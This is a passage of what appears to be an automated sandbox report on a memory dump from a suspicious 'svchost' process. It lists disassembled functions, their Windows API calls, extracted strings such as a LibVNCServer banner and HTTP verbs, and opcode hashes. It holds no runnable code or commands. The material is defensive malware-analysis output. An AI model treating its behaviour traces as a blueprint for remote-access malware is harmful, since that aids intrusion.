                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wsprintf
                                                                                                                                                                                                            • String ID: %s (%s)$LibVNCServer 0.9.7$unknown
                                                                                                                                                                                                            • API String ID: 2111968516-696653274
                                                                                                                                                                                                            • Opcode ID: 6f2b4592c0379c54cd2e22e6550db7af00e3b4b6c991f6b1c1509ecc040b68af
                                                                                                                                                                                                            • Instruction ID: f3a6578cfe0d99802cf4209567976f5db84ca5528890942b20ec814025212247
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f2b4592c0379c54cd2e22e6550db7af00e3b4b6c991f6b1c1509ecc040b68af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA41D631A0465A5FDF01CF28D9A8BE67BA5EF85305F0481F5DD0D9F206DB74A60ACBA0
                                                                                                                                                                                                            Function 02C81130 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C81152
                                                                                                                                                                                                            • GetParent.USER32(?), ref: 02C8115E
                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ParentTextWindowmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4175915554-0
                                                                                                                                                                                                            • Opcode ID: b74dd45d2e0e6feeb0b3e40701464a5f39917aee69e9e432651cfb3d86be10e1
                                                                                                                                                                                                            • Instruction ID: 1c6e0f74244909d4871718247bf6364bebca429c8ae02ae73b286adc8dbb48c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b74dd45d2e0e6feeb0b3e40701464a5f39917aee69e9e432651cfb3d86be10e1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA01D673F402146BDB10AE69ACC8EE7F39CAB54554F048376ED0CE3141EAB1DA5586E0
                                                                                                                                                                                                            Function 02C87A10 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,?), ref: 02C87A23
                                                                                                                                                                                                              • Part of subcall function 02C82CE0: GetProcessHeap.KERNEL32(00000008,02C7FB17,02C7FB03,?,02C87515,?,?,?), ref: 02C82CF1
                                                                                                                                                                                                              • Part of subcall function 02C82CE0: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02C82CF8
                                                                                                                                                                                                              • Part of subcall function 02C82CE0: memset.MSVCRT ref: 02C82D08
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,?,?,02C7E885,?), ref: 02C87A3E
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: memset.MSVCRT ref: 02C8CBE1
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8CC4D
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8CC83
                                                                                                                                                                                                              • Part of subcall function 02C8CBC0: PathFileExistsA.SHLWAPI(00000000,6D1DA3E6), ref: 02C8CCC9
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B23
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B36
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: strstr.MSVCRT ref: 02C92B49
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: GetLastError.KERNEL32 ref: 02C92BCC
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: IsUserAnAdmin.SHELL32 ref: 02C92BD4
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: SetLastError.KERNEL32(00000000), ref: 02C92BEC
                                                                                                                                                                                                              • Part of subcall function 02C92AE0: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$strstr$DirectoryErrorHeapLastmemset$AdminAllocateCreateCurrentExistsFileFolderMakeProcessReadSystemUsermemcpy
                                                                                                                                                                                                            • String ID: GET $POST
                                                                                                                                                                                                            • API String ID: 166286580-2494278042
                                                                                                                                                                                                            • Opcode ID: b333c78d3a20b6ffcc49741ddd97b3878b23029b73683a5636a6cd11ab24f6df
                                                                                                                                                                                                            • Instruction ID: 454c8b4f1ef71aedd1db641b8b7ff59109e943cb5a645da23fe2aedae5e37bcd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b333c78d3a20b6ffcc49741ddd97b3878b23029b73683a5636a6cd11ab24f6df
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EF0283688169136993175A49C84EFFE68D9E93B8CB20A11AE84462100FB39EB0495E6
                                                                                                                                                                                                            Function 02C74000 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020,7556F380,-00000010,?,02C7429D,?), ref: 02C7400C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C7429D,?), ref: 02C74013
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C74052
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                            • String ID: %d.%d.%d.%d
                                                                                                                                                                                                            • API String ID: 1060465051-3491811756
                                                                                                                                                                                                            • Opcode ID: 90f3bffe25918d38bde9a53b8fcd34ac64d1cc177bba7861125c9af0dd738d5d
                                                                                                                                                                                                            • Instruction ID: b501dc9029d853eb5de918cf6f5f699e1cdf3f06e2e433a3f3b2e217bf1b4a7d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90f3bffe25918d38bde9a53b8fcd34ac64d1cc177bba7861125c9af0dd738d5d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55F08CB1940760AFC371CF6A9804B66BBE8EF0C701F00892EF69AC7241E23496008BA4
                                                                                                                                                                                                            Function 02C891C0 Relevance: 6.0, APIs: 4, Instructions: 37synchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,75497390,?,?,02C85BC4), ref: 02C891DA
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C891F4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,?,02C85BC4), ref: 02C8920C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C85BC4), ref: 02C8921D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandle$CloseInformationMutexThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3835061634-0
                                                                                                                                                                                                            • Opcode ID: 09be646a70fb30ee82f280bf00f80ed7ea9f50fea8c1221e81edf7dc80c5b21b
                                                                                                                                                                                                            • Instruction ID: 4e8631e050a50982036c6b7776b7dda47c50071a89984e1eb5ade44873145600
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09be646a70fb30ee82f280bf00f80ed7ea9f50fea8c1221e81edf7dc80c5b21b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8F0BB31EC1314B7E7119BA4FC0AB667A9CEB05F14F184695F901E72C0D7B095108796
                                                                                                                                                                                                            Function 02C8A2A0 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,02C876BE,00000000,02C7FB03,6d1da3b2,?,?,?,?,?,?), ref: 02C8A2B0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8A150,00000000,00000000,00000000), ref: 02C8A2C5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2E3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2F4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1825730051-0
                                                                                                                                                                                                            • Opcode ID: e7951d6158d0f023cb3298f9ca6ecdf0ccdd31ecffba0421fa871bdc5e41cfdb
                                                                                                                                                                                                            • Instruction ID: 7759032f49a377ce48a3e10749932e5de361918053dd698e3838140c36dd71ea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7951d6158d0f023cb3298f9ca6ecdf0ccdd31ecffba0421fa871bdc5e41cfdb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0B430EC0345BBE730EB65AC0AB5577ACAB0CB09F208686F909E31C0DBB096108A65
                                                                                                                                                                                                            Function 02C8E830 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,02C8790E,00000000,02C7FB03,6d1da208,?,?,?,?,?,?), ref: 02C8E840
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8E6E0,00000000,00000000,00000000), ref: 02C8E855
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E873
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E884
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1825730051-0
                                                                                                                                                                                                            • Opcode ID: 8ca719e807d88b0a1ccc0abb404333eca5f52df640138c7b2b3827763e3e069d
                                                                                                                                                                                                            • Instruction ID: d615bfe10b210424d3e604edf11a4273885034ed02a1762a4227eef9c07d4bed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ca719e807d88b0a1ccc0abb404333eca5f52df640138c7b2b3827763e3e069d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EF0B430EC0314BBE7209B68AC0AB5D779CEF04749F244694FD05E31C0DBB0D6108A64
                                                                                                                                                                                                            Function 02C8D930 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,02C8785E,00000000,02C7FB03,6d1da28e,?,?,?,?,?,?), ref: 02C8D940
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8D7E0,00000000,00000000,00000000), ref: 02C8D955
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D973
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D984
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1825730051-0
                                                                                                                                                                                                            • Opcode ID: d5bc30f6507bf9191a570039fe9a7bc5770d9045f46682a713c508e82709490d
                                                                                                                                                                                                            • Instruction ID: 2f326863c8cd02590b19e2f8b904345b89ea7561fb1a108660138517cc8e40b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5bc30f6507bf9191a570039fe9a7bc5770d9045f46682a713c508e82709490d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF0B470EC0304B7E7209B75AD0AF55B69C9B04B59F144694F90AE31C4DBB09610CB64
                                                                                                                                                                                                            Function 02C8E250 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: private$public
                                                                                                                                                                                                            • API String ID: 0-4176808989
                                                                                                                                                                                                            • Opcode ID: 95edc4579f270cfbb72ce7a2e89be70b5a00897b7fb9d6ab8d0e8bae2bfc8fae
                                                                                                                                                                                                            • Instruction ID: ec1e89868abdafde7671aa854f668a39e363cdb733b1ccd60b70895c1776268f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95edc4579f270cfbb72ce7a2e89be70b5a00897b7fb9d6ab8d0e8bae2bfc8fae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB415B326041158ACB30BB2CC8557BB7366EFC532CB49C695F84ACB6A4F721EE45C780
                                                                                                                                                                                                            Function 02C74070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountTick_snprintf
                                                                                                                                                                                                            • String ID: %dd %dh %dm
                                                                                                                                                                                                            • API String ID: 3495410349-3074259717
                                                                                                                                                                                                            • Opcode ID: 0640c349b482966ac159f99e89a9e93f9b7a32822f268aa3d3c49e345b37afc3
                                                                                                                                                                                                            • Instruction ID: 40d2b3104a05a57f35212cc7c0754e7d4fd353f4d78f6662d977a8fa07f0f0fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0640c349b482966ac159f99e89a9e93f9b7a32822f268aa3d3c49e345b37afc3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F08262B8105457A35C541D6C1AABA594F87C8311B8DC67DFD0ACF3E9DCB49C514290
                                                                                                                                                                                                            Function 02C7A820 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A834
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7A850
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2017088797-465009422
                                                                                                                                                                                                            • Opcode ID: 481158786ac46d56176740526b23a3a8955e17810fc96629d63a91feb70789d4
                                                                                                                                                                                                            • Instruction ID: 957f9616aee886f5acf473ca777cac56d7ab32bc140f39379ed3d1ad4d576afd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 481158786ac46d56176740526b23a3a8955e17810fc96629d63a91feb70789d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E01275D846489FC706DF58F448B197BA8B758321F008B56F868873A1C774A960CB50
                                                                                                                                                                                                            Function 02CA6EF0 Relevance: 5.2, APIs: 4, Instructions: 158COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,00000008,00000000,?), ref: 02CA6F28
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000008,00000000,?), ref: 02CA6FCB
                                                                                                                                                                                                            • memset.MSVCRT ref: 02CA7044
                                                                                                                                                                                                            • memset.MSVCRT ref: 02CA707D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1297977491-0
                                                                                                                                                                                                            • Opcode ID: 5a99cf2c19caa97d2b88e01849c5dc47cdf9900b7fa518adc4f37197e6ee117c
                                                                                                                                                                                                            • Instruction ID: fcec472d8811079ba1f776a678c5332af73bd4d2dcd02613962e01a052ad3254
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a99cf2c19caa97d2b88e01849c5dc47cdf9900b7fa518adc4f37197e6ee117c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F516576A00B028FC714CF69C9D566AF7F6FF84308B28492DD98687A10E772F954CB80
                                                                                                                                                                                                            Function 02C7DA00 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02C7DA3F
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02C7DA46
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7DA56
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 02C7DA61
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 471586229-0
                                                                                                                                                                                                            • Opcode ID: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
                                                                                                                                                                                                            • Instruction ID: 5eb95878f65c72346972bc3317d04c08cfa5de28d9cf7efa16dcff17412b4f01
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901F233A852156B86219A69AC44FE7B79CFFC5770F008251FD06DF184D721EA0483E0
                                                                                                                                                                                                            Function 02C7E290 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02C7E94B,?,?,?), ref: 02C7E2A8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C7E94B,?,?,?), ref: 02C7E2AF
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7E2BF
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,02C7E94B,?,?,?), ref: 02C7E2CA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 471586229-0
                                                                                                                                                                                                            • Opcode ID: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
                                                                                                                                                                                                            • Instruction ID: b62f0556ec8815c3ad3f713ae6f7287db69877e0de0a2f1143eff459f65c52f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5F05533A0166137C6226A99AC44FCBB75CEFD2760F400260FE00EF280CA20DE0087F1
                                                                                                                                                                                                            Function 02C7D390 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,?,7556F380,?,02C7D799,00000000,?,00000000,02C7EAE2), ref: 02C7D3A4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D3A7
